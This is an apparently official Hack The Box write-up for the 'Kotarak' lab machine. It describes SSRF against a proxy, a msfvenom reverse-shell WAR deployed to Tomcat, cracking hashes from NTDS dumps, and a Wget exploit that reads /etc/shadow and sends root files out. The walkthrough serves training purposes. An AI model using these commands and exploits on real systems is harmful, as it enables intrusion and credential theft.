Ko Tarak

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22​nd​ October 2017 / Document No D17.100.33

Prepared By: Alexander Reid (Arrexel)
Machine Author: mrb3n
Difficulty: ​Hard
Classification: Official

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Kotarak focuses on many different attack vectors and requires quite a few steps for completion. It
is a great learning experience as many of the topics are not covered by other machines on Hack
The Box.

Skills Required Skills Learned

● Intermediate/advanced knowledge of ● Exploiting server side request forgery

Linux ● Extracting data from NTDS dumps
● Enumerating ports and services ● Exploiting Wget
● Exploiting cron jobs
● Identifying isolated systems and

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Nmap reveals OpenSSH, Apache Tomcat and a normal Apache web server.

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While there are quite a few vulnerabilities and attack vectors available for Tomcat, none appear
to be successful in this context. Looking at the web server on port 60000 reveals a rudimentary
proxy, which happens to be vulnerable to server side request forgery. By fuzzing the URL​ it is possible to access several
localhost-only services.

Browsing to reveals a directory listing. Viewing the source for​ reveals valid login
credentials for the Tomcat server, which can be accessed at

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Apache Tomcat

Once logged into the manager, it is trivial to obtain a shell. The command ​msfvenom -p
java/jsp_shell_reverse_tcp lhost=<LAB IP> lport=<PORT> -f war > writeup.war​ will create a valid
war file that can be easily deployed. Once deployed and started, simply browse to​ to trigger the reverse connection, which can be received with Netcat.

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Privilege Escalation

User (atanas)

libesedb: ​https://github.com/libyal/libesedb

ntdsextract: ​https://github.com/csababarta/ntdsxtract

There are several files in ​/home/tomcat/to_archive/pentest_data​ that appear to contain NTDS

data that was extracted during a pentest. Using libesedb and ntdsextract, it is possible to dump
the user hashes, which are conveniently easy to crack and also work on the target.

The command ​esedbexport -m tables

20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit ​will dump the tables.
Once that is complete, running ​dsusers.py​ from ntdsextract will extract the hashes.

dsusers.py kotarak.dit.export/datatable.3 kotarak.dit.export/link_table.5 hashdump --syshive

kotarak.bin --passwordhashes --lmoutfile lmout.txt --ntoutfile ntout.txt --pwdformat ophc

The hashes will be duhtb-

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Exploit: ​https://www.exploit-db.com/exploits/40064/

Browsing to ​/root​ reveals an ​app.txt​ file, which contains a brief log of web requests. The log
shows that Wget verson 1.16 is run every two minutes. Looking at the network configuration
reveals that the request came from the local machine, so it is safe to assume that Wget is being
run as root.

Using ​authbind​, it is possible to run the exploit script on the target and listen on port 80 with the
command ​authbind python exploit.py​. Having an FTP server running on the local machine is all
that is require to serve ​.wgetrc​.

By default, the exploit obtains the contents of ​/etc/shadow​. Looking at the results, it appears that
there is an ​Ubuntu​ user which does not exist on the main system. Running it again for
/etc/passwd​ confirms that there is some kind of virtual machine or container system with a
separate filesystem.

Simply modifying ​.wgetrc​ at this point to ​post_file = root.txt​ will obtain the root flag.

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